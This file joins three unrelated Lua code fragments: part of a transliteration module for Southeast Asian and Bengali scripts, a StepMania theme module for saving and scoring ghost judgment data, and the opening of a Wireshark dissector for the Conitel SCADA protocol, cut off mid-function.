['០']='0', ['១']='1', ['២']='2', ['៣']='3', ['៤']='4', ['៥']='5', ['៦']='6', ['៧']='7', ['៨']='8', ['៩']='9',
['៰']='0', ['៱']='1', ['៲']='2', ['៳']='3', ['៴']='4', ['៵']='5', ['៶']='6', ['៷']='7', ['៸']='8', ['៹']='9',
-- Thai miscellanea
-- independent vowels
['ฤ']='ṛ', ['ฤๅ']='ṝ', ['ฦ']='ḷ', ['ฦๅ']='ḹ',
-- chandrabindu, anusvara, visarga & avagraha
-- [dc('ក')]='m̐',
[dc('กํ')]='ṃ', ['ะ']='ḥ',
-- ['']='’',
--numerals
['๐']='0', ['๑']='1', ['๒']='2', ['๓']='3', ['๔']='4', ['๕']='5', ['๖']='6', ['๗']='7', ['๘']='8', ['๙']='9',
-- Lao miscellanea
-- chandrabindu, anusvara, visarga & avagraha
-- [dc('ក')]='m̐',
[dc('ກໍ')]='ṃ', ['ະ']='ḥ',
-- ['']='’',
--numerals
['໐']='0', ['໑']='1', ['໒']='2', ['໓']='3', ['໔']='4', ['໕']='5', ['໖']='6', ['໗']='7', ['໘']='8', ['໙']='9',
-- All scripts
--punctuation
['॥']='.', ['။']='.', ['᪩']='.', ['᪫']='.', ['៕']='.', ['๚']='.', --double danda
['।']='.', ['၊']='.', ['᪨']='.', ['᪪']='.', ['។']='.', ['ฯ']='.', ['ຯ']='.', --danda
--Vedic extensions
['ᳵ']='x', ['ᳶ']='f',
--Om
-- ['ॐ']='oṃ',
--reconstructed
['*'] = '',
}
-- Also handle subscript consonants encoded as marks.
local S = dc('ကျကြကွကှကၞကၟကၠ').. -- Myanmar subscripts
dc('ᨠᩕᨠᩖᨠᩛᨠᩜᨠᩝᨠᩞ') -- Lanna subscripts
-- consonants and part 1 of NFC-multi-part independent vowels.
local C = '[কখগঘঙচছজঝঞটঠডঢণতথদধনপফবভমযরলवळশষসহৰৱ'.. -- Bengali
'ကခဂဃငစဆဇဈဉဋဌဍဎဏတထဒဓနပဖဗဘမယရလဝဠၐၑသဟညဿအ'.. -- Myanmar Part 1
'ၚၛၵၶၷꧠၸꧡၹꧢၺꩦꩧꩨꩩꧣၻꩪၼၽၿꧤꩮႁဢဣဥ'.. -- Myanmar Part 2 (Mon and Shan)
'ᨠᨡᨣᨥᨦᨧᨨᨩᨫᨬᨭᨮᨯᨰᨱᨲᨳᨴᨵᨶᨷᨸᨹᨻᨽᨾᨿᩁᩃᩅᩊᩆᩇᩈᩉᩔᩋᩐ'.. -- Lanna
'កខគឃងចឆជឈញដឋឌឍណតថទធនបផពភមយរលវឡឝសឞហអ'.. -- Khmer
'กขคฆงจฉชฌญฏฐฑฒณตถทธนปผพภมยรลวศษสหฬอฤฦ'.. -- Thai.
'ກຂຄຆງຈຉຊຌຎຏຐຑຒຓຕຖທຘນປຜພຠມຍຢຣລວຨຩສຫຬອ'.. -- Lao
S..']['..u(0x09bc, 0x200d)..']?' -- And allow Bengali nukta or necessary ZWJ.
-- One character diacritics
local dia =
dc('[কাকিকীকুকূকৃকৄকৢকৣকেকৈকোকৌক্'.. -- Bengali
'ကာကါကိကီကုကူကၖကၗကၘကၙကေကဲက္က်ကဳကႃ'.. -- Myanmar
'ᨠᩣᨠᩤᨠᩥᨠᩦᨠᩩᨠᩪᩂᩄᨠᩮᨠᩱᨠᩰᨠ᩠ᨠ᩺ᨠ᩼'.. -- Lanna
'ᨠᩫᩢ'.. -- Lanna diacritics in second or third place.
'កាកិកីកុកូកេកៃកោកៅក្ក៑'.. -- Khmer
'กักุิกูีเโไาๅฤฦกฺกึก์'.. -- Thai
'ກັກຸິກູີເກົາໂໄກ຺ກຶກ໌'.. -- Lao
']')
local diax = {}
local ti = table.insert;
ti(diax, '(')
ti(diax, dia) ti(diax, '?')
ti(diax, dia) ti(diax, '?')
ti(diax, dia) ti(diax, '?')
ti(diax, dia) ti(diax, '?)')
diax = table.concat(diax)
local explicit = nil
if options and options.impl then
if options.impl == 'yes' then
explicit = false
elseif options.impl == 'no' then
explicit = true
end
end
if sc == 'Khmr' then
dep_liquid = '('..C..dc(')(ក្)')..'([ឫឬឭឮ])'; -- Avoid gsub in gsub bug.
text = gsub(
text, dep_liquid,
function(c, j, d) return consonants[c]..d end
)
-- Regularise robat
robat_fix3 = '('..C..dc('ក្')..C..dc('ក្')..C..')('..dc('ក៌)')
robat_fix2 = '('..C..dc('ក្')..C..')('..dc('ក៌)')
robat_fix1 = '('..C..')('..dc('ក៌)')
derobatted = 'រ្'..'%1'
text = gsub(text, robat_fix3, derobatted)
text = gsub(text, robat_fix2, derobatted)
text = gsub(text, robat_fix1, derobatted)
elseif sc == 'Thai' or sc == 'Laoo' then
local match = mw.ustring.match
local v1 = dc('[กัກັ]')
local v2 = dc('[กัะກັະ]')
local va = dc('[กฺ]')
if lang == 'sa' then
if match(text, v1) then explicit = true end -- SARA A is visarga!
else
if match(text, v2) then explicit = true end
end
local yLao, nuktaed
if sc == 'Laoo' then
if options and options.y then
if options.y == 'yaa' or options.y == 'ຢ' then
yLao = 'yaa'
elseif options.y == 'yung' or options.y == 'ຍ' then
yLao = 'yung'
end
end
if not yLao then
if match(text, 'ຢ') then
yLao = 'yaa'
else
yLao = 'yung'
end
end
if explicit then
nuktaed = match(text, u(0xeba))
else
local str
if lang == 'sa' then
str = dc('ກ຺[ກັາກຸິກູີ]')
else
str = dc('ກ຺[ກັາກຸິກູີະ]')
end
nuktaed = match(text, str)
end
if nuktaed then -- Convert to extended alphabet
rs = {
["ຄ຺"] = "ຆ", ["ສ຺"] = "ຉ", ["ຊ຺"] = "ຌ", ["ຍ຺"] = "ຎ",
["ຕ຺"] = "ຏ", ["ຖ຺"] = "ຐ", ["ດ"] = "ຑ", ["ນ຺"] = "ຓ",
["ທ຺"] = "ຘ", ["ພ຺"] = "ຠ", ["ລ຺"] = "ຬ", ["ງ຺"] = dc("ໍກ"),
}
text = gsub(text, '[ຄສຊຍຕຖດນທພລງ]'..u(0xeba)..'?', rs)
explicit = true
end
if yLao == 'yaa' then text = gsub(text, 'ຍ', 'ຎ') end
end
if match(text, va) then explicit = false end
if explicit == nil then
-- It looks as though gsub (from dc()) and match interfere, so need local variables.
local ngf1=dc('[กักิกุກັກິກຸ][งງ]$')
local ngf2=dc('[กักิกุກັກິກຸ][งງ] ')
if (match(text, ngf1) or match(text, ngf2)) then explicit = true end
end
if not explicit then
diax = gsub(diax, '[ฤฦ]', 'า') -- Treat as ฤ and ฦ consonants.
local search = '([เโไເໂໄ])('..C..')(['..u(0x0e3a, 0xeba)..'])'
local longswap = function(p, c, v) return c..v..p end
text = gsub(text, search, longswap)
text = gsub(text, search, longswap)
end
if false and sc == 'Laoo' then -- Keep around for future debugging
local nr = 'F'
if nuktaed then nr = 'T' end
if yLao then
nr = nr .. yLao
else
nr = nr .. 'y?'
end
nr = nr .. '-'
if not options or not options.impl then
if explicit == nil then
text = 'GN-'..nr..text
elseif explicit == false then
text = 'GI-'..nr..text
else
text = 'GE-'..nr..text
end
elseif options.impl == 'both' then
if explicit == nil then
text = 'N-'..nr..text
elseif explicit == false then
text = 'I-'..nr..text
else
text = 'E-'..nr..text
end
elseif options.impl == 'yes' then
text = 'Y-'..nr..text
elseif options.impl == 'no' then
text = 'N-'..nr..text
elseif options.impl then
text = options.impl .. nr .. text
end
end
local pair = '([เโไເໂໄ])('..C..')'
text = gsub(text, pair, '%2%1')
if explicit and lang ~= 'sa' then -- SARA A is a vowel.
diax = '([ะະ'..string.sub(diax,3)
end
if explicit and sc == 'Laoo' then -- Clean up clusters
ass = {
["ກຄ"] = "ຄຄ", ["ດຈ"] = "ຈຈ", ["ດຊ"] = "ຊຊ",
["ດຕ"] = "ຕຕ", ["ດຖ"] = "ຕຖ", ["ດທ"] = "ທທ", ["ດສ"] = "ສສ",
["ຍຈ"] = "ຎຈ", ["ຍສ"] = "ຎຉ", ["ຍຊ"] = "ຎຊ",
["ນຈ"] = "ນຈ", ["ນສ"] = "ຎຉ", ["ນຊ"] = "ຎຊ", ["ນຍ"] = "ຎຎ",
["ບປ"] = "ປປ", ["ບຜ"] = "ປຜ", ["ບພ"] = "ພພ", ["ບ"] = "ປ",
}
text = gsub(text, '[ກດບຍນ][ຄຕຖທປຜພສລຈສຊຍ]?', ass)
end
end
if sc == 'Lana' then
-- Disambiguate lanna combining loop below.
cl_search = dc('[ᨲᨻᨾ]ᨠᩛ')
text = gsub(text, cl_search,
{['ᨲᩛ']='ᨲ᩠ᨳ', ['ᨻᩛ']='ᨻ᩠ᨻ', ['ᨾᩛ']='ᨾ᩠ᨻ'})
end
if sc == 'Mymr' or sc == 'Lana' then
local fn = function(c, d) return consonants[c]..d end
local search = '('..C..')(['..S..'])'
text = gsub(text, search, fn);
text = gsub(text, search, fn); -- and again
end
if sc == 'Beng' then
-- Aberrant conversion:
text = gsub(text, u(0x09b2, 0x9cd, 0x9bc, 0x9cd, 0x9b9), 'ḷহ') -- raw
text = gsub(text, u(0x09b2, 0x9bc, 0x9cd, 0x9cd, 0x9b9), 'ḷহ') -- NFC
-- Proper conversion:
text = gsub(text, u(0x09b2, 0x9cd, 0x9bc, 0x9b9), 'ḷহ') -- not NFC
-- text = gsub(text, u(0x09b2, 0x9bc, 0x9cd, 0x9b9), 'ḷহ') -- NFC
end
text = gsub(text, '('..C..')'..diax,
function(c, d)
local val = tt[c..d]
if val then return val end
local cn = consonants[c]
if not cn then return 'X('..c..')' end
if d ~= "" then
return cn .. (diacritics[d] or 'NIL('..d..')')
elseif explicit then
return cn
else
return cn .. 'a'
end
end
)
text = gsub(text, '.', tt)
-- Bodge alphabetic Thai and Lao anusvara
if explicit and text then
text = gsub(text, 'ṅ$', 'ṃ')
text = gsub(text, 'ṅ([^kg])', 'ṃ%1')
end
else
text = nil -- Not ready for use yet!
end
return text
end
function export.tr(text, lang, sc)
return export.trwo(text, lang, sc, {})
end
return export
|
--[[
more like an extension of the highscore class...ish now.
format:
ghostTable = {
[SimfileSHA1] = {
[ghostTableSHA1] = {
judgmentData = string,
judgmentHash = string,
timingDifficulty = number,
lifeDifficulty = number,
offsetMean = number,
offsetStdDev = number
}
}
}
--]]
local defaultScoreType = themeConfig:get_data().global.DefaultScoreType
local scoreWeight = { -- Score Weights for DP score (MAX2)
TapNoteScore_W1 = THEME:GetMetric("ScoreKeeperNormal","GradeWeightW1"), -- 2
TapNoteScore_W2 = THEME:GetMetric("ScoreKeeperNormal","GradeWeightW2"), -- 2
TapNoteScore_W3 = THEME:GetMetric("ScoreKeeperNormal","GradeWeightW3"), -- 1
TapNoteScore_W4 = THEME:GetMetric("ScoreKeeperNormal","GradeWeightW4"), -- 0
TapNoteScore_W5 = THEME:GetMetric("ScoreKeeperNormal","GradeWeightW5"), -- -4
TapNoteScore_Miss = THEME:GetMetric("ScoreKeeperNormal","GradeWeightMiss"), -- -8
HoldNoteScore_Held = THEME:GetMetric("ScoreKeeperNormal","GradeWeightHeld"), -- 6
TapNoteScore_HitMine = THEME:GetMetric("ScoreKeeperNormal","GradeWeightHitMine"), -- -8
HoldNoteScore_LetGo = THEME:GetMetric("ScoreKeeperNormal","GradeWeightLetGo"), -- 0
HoldNoteScore_MissedHold = THEME:GetMetric("ScoreKeeperNormal","GradeWeightMissedHold"),
TapNoteScore_AvoidMine = 0,
TapNoteScore_CheckpointHit = THEME:GetMetric("ScoreKeeperNormal","GradeWeightCheckpointHit"), -- 0
TapNoteScore_CheckpointMiss = THEME:GetMetric("ScoreKeeperNormal","GradeWeightCheckpointMiss"), -- 0
}
local psWeight = { -- Score Weights for percentage scores (EX oni)
TapNoteScore_W1 = THEME:GetMetric("ScoreKeeperNormal","PercentScoreWeightW1"),
TapNoteScore_W2 = THEME:GetMetric("ScoreKeeperNormal","PercentScoreWeightW2"),
TapNoteScore_W3 = THEME:GetMetric("ScoreKeeperNormal","PercentScoreWeightW3"),
TapNoteScore_W4 = THEME:GetMetric("ScoreKeeperNormal","PercentScoreWeightW4"),
TapNoteScore_W5 = THEME:GetMetric("ScoreKeeperNormal","PercentScoreWeightW5"),
TapNoteScore_Miss = THEME:GetMetric("ScoreKeeperNormal","PercentScoreWeightMiss"),
HoldNoteScore_Held = THEME:GetMetric("ScoreKeeperNormal","PercentScoreWeightHeld"),
TapNoteScore_HitMine = THEME:GetMetric("ScoreKeeperNormal","PercentScoreWeightHitMine"),
HoldNoteScore_LetGo = THEME:GetMetric("ScoreKeeperNormal","PercentScoreWeightLetGo"),
HoldNoteScore_MissedHold = THEME:GetMetric("ScoreKeeperNormal","PercentScoreWeightMissedHold"),
TapNoteScore_AvoidMine = 0,
TapNoteScore_CheckpointHit = THEME:GetMetric("ScoreKeeperNormal","PercentScoreWeightCheckpointHit"),
TapNoteScore_CheckpointMiss = THEME:GetMetric("ScoreKeeperNormal","PercentScoreWeightCheckpointMiss"),
}
local migsWeight = { -- Score Weights for MIGS score
TapNoteScore_W1 = 3,
TapNoteScore_W2 = 2,
TapNoteScore_W3 = 1,
TapNoteScore_W4 = 0,
TapNoteScore_W5 = -4,
TapNoteScore_Miss = -8,
HoldNoteScore_Held = IsGame("pump") and 0 or 6,
TapNoteScore_HitMine = -8,
HoldNoteScore_LetGo = 0,
HoldNoteScore_MissedHold = 0,
TapNoteScore_AvoidMine = 0,
TapNoteScore_CheckpointHit = 2,
TapNoteScore_CheckpointMiss = -8,
}
local currentGhostData = {
PlayerNumber_P1 = {},
PlayerNumber_P2 = {}
} -- Loaded from theme
local currentGhostIndex = {
PlayerNumber_P1 = 1,
PlayerNumber_P2 = 1
}
local tempGhostData = {
PlayerNumber_P1 = {},
PlayerNumber_P2 = {}
} -- Tracked
local ghostScoreStats = { -- Table containing the # of judgements made so far
PlayerNumber_P1 = {
TapNoteScore_W1 = 0,
TapNoteScore_W2 = 0,
TapNoteScore_W3 = 0,
TapNoteScore_W4 = 0,
TapNoteScore_W5 = 0,
TapNoteScore_Miss = 0,
HoldNoteScore_Held = 0,
TapNoteScore_HitMine = 0,
HoldNoteScore_LetGo = 0,
HoldNoteScore_MissedHold = 0,
TapNoteScore_AvoidMine = 0,
TapNoteScore_CheckpointHit = 0,
TapNoteScore_CheckpointMiss = 0
},
PlayerNumber_P2 = {
TapNoteScore_W1 = 0,
TapNoteScore_W2 = 0,
TapNoteScore_W3 = 0,
TapNoteScore_W4 = 0,
TapNoteScore_W5 = 0,
TapNoteScore_Miss = 0,
HoldNoteScore_Held = 0,
TapNoteScore_HitMine = 0,
HoldNoteScore_LetGo = 0,
HoldNoteScore_MissedHold = 0,
TapNoteScore_AvoidMine = 0,
TapNoteScore_CheckpointHit = 0,
TapNoteScore_CheckpointMiss = 0
}
}
-- Resets the variables
function resetGhostData()
for _,pn in pairs({PLAYER_1,PLAYER_2}) do
currentGhostData[pn] = {}
tempGhostData[pn] = {}
currentGhostIndex[pn] = 1
for k,__ in pairs(ghostScoreStats[pn]) do
ghostScoreStats[pn][k] = 0
ghostScoreStats[pn][k] = 0
end
end
end
-- Adds a judgment event to the tempghostdata table.
function addJudgeGD(pn,judgment,isHold)
tempGhostData[pn][#(tempGhostData[pn])+1] = {judgment,isHold}
end
-- Returns the SHA-1 Hash of the simfile that will be used for the ghostdata table key.
local function getSimfileHash(steps)
return SHA1FileHex(steps:GetFilename())
end
-- Returns the SHA-1 of the score's timestamp to be used as the 2nd key of the 2d table.
-- Since we're trying to tie each ghostdata to each HighScore saved in stepmania,
-- its timestamp is the only thing that can uniquely identify a score afaik.
local function getGhostDataHash(score)
return SHA1StringHex(score:GetDate())
end
-- Returns the hash of the concatenated string of several ghostdata metadata.
local function getJudgmentDataHash(score,judgmentDataString,timingDifficulty,lifeDifficulty)
return SHA1StringHex(string.format("%s%s%d%d",getGhostDataHash(score),SHA1StringHex(judgmentDataString),timingDifficulty,lifeDifficulty))
end
-- Returns true if ghostdata exists.
function ghostDataExists(pn,score)
if not GAMESTATE:IsPlayerEnabled(pn) or
GAMESTATE:IsCourseMode() or
score == nil then
return false
end
local simfileSHA1 = getSimfileHash(GAMESTATE:GetCurrentSteps(pn))
local ghostTableSHA1 = getGhostDataHash(score)
local ghostData = ghostTable:get_data(pn_to_profile_slot(pn))[ghostTableSHA1]
if ghostTable:get_data(pn_to_profile_slot(pn))[simfileSHA1] ~= nil then
return ghostTable:get_data(pn_to_profile_slot(pn))[simfileSHA1][ghostTableSHA1] ~= nil
end
return false
end
-- Returns true if the ghostdata is valid.
function isGhostDataValid(pn,score)
if not GAMESTATE:IsPlayerEnabled(pn) or
GAMESTATE:IsCourseMode() or
score == nil then
return false
end
local simfileSHA1 = getSimfileHash(GAMESTATE:GetCurrentSteps(pn))
local ghostTableSHA1 = getGhostDataHash(score)
if ghostDataExists(pn,score) then
local judgmentHash = ghostTable:get_data(pn_to_profile_slot(pn))[simfileSHA1][ghostTableSHA1].judgmentHash
local judgmentDataString = ghostTable:get_data(pn_to_profile_slot(pn))[simfileSHA1][ghostTableSHA1].judgmentData
local timingDifficulty = ghostTable:get_data(pn_to_profile_slot(pn))[simfileSHA1][ghostTableSHA1].timingDifficulty
local lifeDifficulty = ghostTable:get_data(pn_to_profile_slot(pn))[simfileSHA1][ghostTableSHA1].lifeDifficulty
return judgmentHash == getJudgmentDataHash(score,judgmentDataString,timingDifficulty,lifeDifficulty)
end
return false
end
--Reads the ghostdata string and loads it into the currentghostdata table.
--currentghostdata will be a empty table if it doesn't exist.
function readGhostData(pn,score)
currentGhostData[pn] = {}
if not GAMESTATE:IsPlayerEnabled(pn) or
GAMESTATE:IsCourseMode() or
score == nil then
return
end
local simfileSHA1 = getSimfileHash(GAMESTATE:GetCurrentSteps(pn))
local ghostTableSHA1 = getGhostDataHash(score)
if isGhostDataValid(pn,score) then
local judgmentDataString = ghostTable:get_data(pn_to_profile_slot(pn))[simfileSHA1][ghostTableSHA1].judgmentData
-- Check if the hash of the data string match the hash saved in the ghostdata.
for i = 1 , #judgmentDataString do
local isHold
local judgment
local num = string.byte(judgmentDataString,i)
isHold = num >= 16
if isHold then
num = num -16
judgment = HoldNoteScore[num+1] -- enum values are 0 indexed, tables are 1 indexed.
else
judgment = TapNoteScore[num+1]
end
currentGhostData[pn][#currentGhostData[pn]+1] = {judgment,isHold}
end
end
end
-- Returns the ghostscore table parameter if it exists.
function getGhostDataParameter(pn,score,parameter)
if not GAMESTATE:IsPlayerEnabled(pn) or
GAMESTATE:IsCourseMode() or
score == nil then
return
end
local simfileSHA1 = getSimfileHash(GAMESTATE:GetCurrentSteps(pn))
local ghostTableSHA1 = getGhostDataHash(score)
if ghostDataExists(pn,score) then
return ghostTable:get_data(pn_to_profile_slot(pn))[simfileSHA1][ghostTableSHA1][parameter]
end
end
-- Saves the data loaded in the tempGhostData table as a string
function saveGhostData(pn,score)
if not GAMESTATE:IsPlayerEnabled(pn) or
GAMESTATE:IsCourseMode() or
score == nil then
return
end
local simfileSHA1 = getSimfileHash(GAMESTATE:GetCurrentSteps(pn))
local ghostTableSHA1 = getGhostDataHash(score)
-- Convert the data in tempGhostData table into a binary string.
local judgmentDataString = ""
for _,v in pairs(tempGhostData[pn]) do
local temp = 0
if v[2] then -- Holds
temp = tonumber(Enum.Reverse(HoldNoteScore)[v[1]])+16
else
temp = tonumber(Enum.Reverse(TapNoteScore)[v[1]])
end
judgmentDataString = judgmentDataString..string.format("%c",temp)
end
-- If there's no previous ghostscore entry for a song, make a new table.
if ghostTable:get_data(pn_to_profile_slot(pn))[simfileSHA1] == nil then
ghostTable:get_data(pn_to_profile_slot(pn))[simfileSHA1] = {}
end
-- Make and save all the table parameters
ghostTable:get_data(pn_to_profile_slot(pn))[simfileSHA1][ghostTableSHA1] = {}
ghostTable:get_data(pn_to_profile_slot(pn))[simfileSHA1][ghostTableSHA1].judgmentData = judgmentDataString
ghostTable:get_data(pn_to_profile_slot(pn))[simfileSHA1][ghostTableSHA1].timingDifficulty = GetTimingDifficulty()
ghostTable:get_data(pn_to_profile_slot(pn))[simfileSHA1][ghostTableSHA1].lifeDifficulty = GetLifeDifficulty()
ghostTable:get_data(pn_to_profile_slot(pn))[simfileSHA1][ghostTableSHA1].version = getThemeVersion()
ghostTable:get_data(pn_to_profile_slot(pn))[simfileSHA1][ghostTableSHA1].assist = false
ghostTable:get_data(pn_to_profile_slot(pn))[simfileSHA1][ghostTableSHA1].judgmentHash = getJudgmentDataHash(score,judgmentDataString,GetTimingDifficulty(),GetLifeDifficulty())
ghostTable:set_dirty(pn_to_profile_slot(pn))
ghostTable:save(pn)
SCREENMAN:SystemMessage("Ghost data saved.")
end
--Deletes a single ghostdata given the player, score.
function deleteGhostData(pn,score)
if not GAMESTATE:IsPlayerEnabled(pn) or
GAMESTATE:IsCourseMode() or
score == nil then
return
end
local simfileSHA1 = getSimfileHash(GAMESTATE:GetCurrentSteps(pn))
local ghostTableSHA1 = getGhostDataHash(score)
local ghostData = ghostTable:get_data(pn_to_profile_slot(pn))[ghostTableSHA1]
ghostTable:get_data(pn_to_profile_slot(pn))[simfileSHA1][ghostTableSHA1] = nil
ghostTable:set_dirty(pn_to_profile_slot(pn))
ghostTable:save(pn_to_profile_slot(pn))
SCREENMAN:SystemMessage("Ghost data deleted.")
end
--Deletes all ghostdata for a song given player.
function deleteGhostDataForSong(pn)
if not GAMESTATE:IsPlayerEnabled(pn) or
GAMESTATE:IsCourseMode() or
score == nil then
return
end
local simfileSHA1 = getSimfileHash(GAMESTATE:GetCurrentSteps(pn))
ghostTable:get_data(pn_to_profile_slot(pn))[simfileSHA1] = nil
ghostTable:set_dirty(pn_to_profile_slot(pn))
ghostTable:save(pn_to_profile_slot(pn))
SCREENMAN:SystemMessage("All Ghost data for this song deleted.")
end
--not exactly a pop anymore since I keep the values in the table but w/e.
--returns the judgment and adds the judgment to the ghostScoreStats table.
function popGhostData(pn)
if #currentGhostData[pn] == 0 or currentGhostIndex[pn] > #currentGhostData[pn] then
return nil
end
local judgment = currentGhostData[pn][currentGhostIndex[pn]]
ghostScoreStats[pn][judgment[1]] = ghostScoreStats[pn][judgment[1]]+1
currentGhostIndex[pn] = currentGhostIndex[pn] + 1
return judgment
end
-- Gets the current exscore of the ghost data.
function getCurScoreGD(pn,scoreType)
if scoreType == 0 then
scoreType = defaultScoreType
end
if scoreType == 1 then
return (ghostScoreStats[pn]["TapNoteScore_W1"]*scoreWeight["TapNoteScore_W1"]+ghostScoreStats[pn]["TapNoteScore_W2"]*scoreWeight["TapNoteScore_W2"]+ghostScoreStats[pn]["TapNoteScore_W3"]*scoreWeight["TapNoteScore_W3"]+ghostScoreStats[pn]["TapNoteScore_W4"]*scoreWeight["TapNoteScore_W4"]+ghostScoreStats[pn]["TapNoteScore_W5"]*scoreWeight["TapNoteScore_W5"]+ghostScoreStats[pn]["TapNoteScore_Miss"]*scoreWeight["TapNoteScore_Miss"]+ghostScoreStats[pn]["TapNoteScore_CheckpointHit"]*scoreWeight["TapNoteScore_CheckpointHit"]+ghostScoreStats[pn]["TapNoteScore_CheckpointMiss"]*scoreWeight["TapNoteScore_CheckpointMiss"]+ghostScoreStats[pn]["TapNoteScore_HitMine"]*scoreWeight["TapNoteScore_HitMine"]+ghostScoreStats[pn]["HoldNoteScore_Held"]*scoreWeight["HoldNoteScore_Held"]+ghostScoreStats[pn]["HoldNoteScore_LetGo"]*scoreWeight["HoldNoteScore_LetGo"]) or 0-- maximum DP
elseif scoreType == 2 then
return (ghostScoreStats[pn]["TapNoteScore_W1"]*psWeight["TapNoteScore_W1"]+ghostScoreStats[pn]["TapNoteScore_W2"]*psWeight["TapNoteScore_W2"]+ghostScoreStats[pn]["TapNoteScore_W3"]*psWeight["TapNoteScore_W3"]+ghostScoreStats[pn]["TapNoteScore_W4"]*psWeight["TapNoteScore_W4"]+ghostScoreStats[pn]["TapNoteScore_W5"]*psWeight["TapNoteScore_W5"]+ghostScoreStats[pn]["TapNoteScore_Miss"]*psWeight["TapNoteScore_Miss"]+ghostScoreStats[pn]["TapNoteScore_CheckpointHit"]*psWeight["TapNoteScore_CheckpointHit"]+ghostScoreStats[pn]["TapNoteScore_CheckpointMiss"]*psWeight["TapNoteScore_CheckpointMiss"]+ghostScoreStats[pn]["TapNoteScore_HitMine"]*psWeight["TapNoteScore_HitMine"]+ghostScoreStats[pn]["HoldNoteScore_Held"]*psWeight["HoldNoteScore_Held"]+ghostScoreStats[pn]["HoldNoteScore_LetGo"]*psWeight["HoldNoteScore_LetGo"]) or 0 -- maximum %score DP
elseif scoreType == 3 then
return (ghostScoreStats[pn]["TapNoteScore_W1"]*migsWeight["TapNoteScore_W1"]+ghostScoreStats[pn]["TapNoteScore_W2"]*migsWeight["TapNoteScore_W2"]+ghostScoreStats[pn]["TapNoteScore_W3"]*migsWeight["TapNoteScore_W3"]+ghostScoreStats[pn]["TapNoteScore_W4"]*migsWeight["TapNoteScore_W4"]+ghostScoreStats[pn]["TapNoteScore_W5"]*migsWeight["TapNoteScore_W5"]+ghostScoreStats[pn]["TapNoteScore_Miss"]*migsWeight["TapNoteScore_Miss"]+ghostScoreStats[pn]["TapNoteScore_CheckpointHit"]*migsWeight["TapNoteScore_CheckpointHit"]+ghostScoreStats[pn]["TapNoteScore_CheckpointMiss"]*migsWeight["TapNoteScore_CheckpointMiss"]+ghostScoreStats[pn]["TapNoteScore_HitMine"]*migsWeight["TapNoteScore_HitMine"]+ghostScoreStats[pn]["HoldNoteScore_Held"]*migsWeight["HoldNoteScore_Held"]+ghostScoreStats[pn]["HoldNoteScore_LetGo"]*migsWeight["HoldNoteScore_LetGo"]) or 0
end
return 0
end
|
BCH = {0x12,0x9,0x16,0xB,0x17,0x19,0x1E,0xF,0x15,0x18,0xC,0x6,0x3,
0x13,0x1B,0x1F,0x1D,0x1C,0xE,0x7,0x11,0x1A,0xD,0x14,0xA,0x5}
-- declare our protocol
local conitel_proto = Proto("conitel","Conitel Protocol")
local f = conitel_proto.fields
-- Need to use ProtoFields for the Station, MtoS, Function and Data so that we can then display them as columns, which then means we can export to excel.
f.conitelfunction = ProtoField.uint8 ("conitel.function", "Function", base.DEC)
f.station = ProtoField.uint8 ("conitel.station", "Station", base.DEC)
f.group = ProtoField.uint8("conitel.group", "Group", base.DEC)
f.blockcount = ProtoField.uint8("conitel.blockcount","BlockCount", base.HEX)
f.data = ProtoField.bytes("conitel.data", "Packet Data")
--f.blocks = ProtoField.uint8("conitel.data", "Payload Block")
--f.adata = ProtoField.uint16("conitel.adata","A Data", base.HEX)
--f.bdata = ProtoField.uint16("conitel.bdata","B Data", base.HEX)
f.soedata = ProtoField.uint8("conitel.soedata", "SOE")
--f.soegroup = ProtoField.uint8("conitel.soegroup","SOE Group", base.HEX)
--f.soeindex = ProtoField.uint16("conitel.soeindex","SOE Index", base.HEX)
-- create a function to dissect it
function conitel_proto.dissector(buffer,pinfo,tree)
local pktlen = buffer:reported_length_remaining()
--Define the strings for the functions
local functionnames = {
[0] = "Scan Data",
[1] = "Execute Command",
[2] = "Trip",
[3] = "Setpoint A",
[4] = "Close",
[5] = "Setpoint B",
[8] = "Reset RTU",
[9] = "Master Station Request",
[10] = "Send New SOE",
[11] = "Repeat SOE",
[13] = "Unit Raise / Lower",
[14] = "Freeze and Scan Accumulators",
[15] = "Freeze, Scan and Reset Accumulators"
}
--debug("entered the conitel dissector");
-- Check to see if we actually have an conitel packet
-- Some out of order TCP packets don't get called for the dissector, so they are conitel but don't get classified....
if ((pktlen % 4) ~= 0) then
--debug("Exited conitel dissector - not mod 4");
return 0 -- Not an conitel Packet, must be *4
end
--debug("Got past mod 4 check");
if (pktlen > 4*16) then
return 0 -- Not a Conitel Packet, too many blocks
end
--debug("Got past max packet size check");
local blockcount = pktlen / 4
local block = buffer(0,4):uint() -- 4 Bytes per block
local conitelfunction = buffer(0,1):bitfield(0,4)
local functionname = functionnames[conitelfunction]
local group = buffer(1,1):bitfield(0,4)
local station = buffer(0,1):bitfield(4,4)
-- Just a double check we are getting the same thing...
--print("Function " .. conitelfunction .. " - " .. GetFunction(block));
--print("Station " .. station .. " - " .. GetStation(block));
--print("Group " .. group .. " - " .. GetGroup(block));
--print("Function Name" .. functionnames[0]);
if ( functionname == nil) then
functionname = "Unknown conitel Function" -- Not an conitel Packet
end
-- Check all blocks for correct bits
for i = 0, blockcount-1,1
do
block = buffer(i*4,4):uint()
-- Check the A bit is zero in the first block and one in each subsequent block
if (i == 0) then
if (GetBlockABit(block) ~= 0) then
--debug("BlockABit not zero in first block");
return 0
end
else
if (GetBlockABit(block) ~= 1) then
--debug("BlockABit not one in non-first block");
return 0
end
end
-- BlockB Bit Must always be zero
if (GetBlockBBit(block) ~= 0) then
--debug("BlockBBit not zero");
return 0
end
-- Only the last block will have the EOM flag set
if (i == blockcount-1) then
if (GetEOM(block) ~= 1) then
--debug("EOMBit not set in last block");
return 0
end
else
if (GetEOM(block) ~= 0) then
--debug("EOMBit set in non-last block");
return 0
end
end
-- Check BCH Does the calculation match the stored value?
if (GetBCH(block) ~= CalculateBCH(block))then
--debug("BCH Failed in block" .. i);
return 0
end
end
pinfo.cols.protocol = "conitel"
pinfo.cols.info:set("Stn: "..station.." Grp: "..group.." Fn: "..functionname )
pinfo.cols.info:fence()
local subtree = tree:add(conitel_proto,buffer(),"Conitel/Baker Protocol Data")
subtree:append_text (" - Fn: " .. functionname)
-- Now add the sub trees for the fields we are interested in
subtree:add(f.conitelfunction,conitelfunction) -- The buffer notation (highlighting in data) only works for full bytes.
local stationleaf = subtree:add(f.station, station)
--if (buffer(0,1):bitfield(1,7) == 0x7F) then
-- stationleaf.append_text(" - WARNING EXTENDED ADDRESS NOT DECODED");
local groupleaf = subtree:add(f.group, group)
-- Dont really need block count! DataLength / 4
local blockcounttree = subtree:add(f.blockcount, blockcount)
